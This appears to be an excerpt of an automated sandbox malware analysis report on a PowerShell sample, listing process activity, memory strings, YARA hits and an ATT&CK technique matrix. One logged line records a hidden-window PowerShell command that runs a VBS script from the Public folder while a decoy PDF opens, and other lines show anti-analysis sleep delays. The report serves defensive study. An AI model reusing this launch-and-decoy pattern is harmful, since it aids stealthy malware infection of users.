      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5315
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4362
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6368
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3373
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664 | Thread sleep time: -14757395258967632s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916 | Thread sleep count: 6368 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916 | Thread sleep count: 3373 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660 | Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 5648 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000007.00000002.3369589311.000002C55C658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3367675953.000002C55702F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000000.00000002.2422673623.0000028B29C73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_3924.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3924, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
MITRE ATT&CK matrix. A leading number is the count of report signatures mapped to that technique; cells without a number are the matrix's unpopulated template entries.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 PowerShell | 1 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
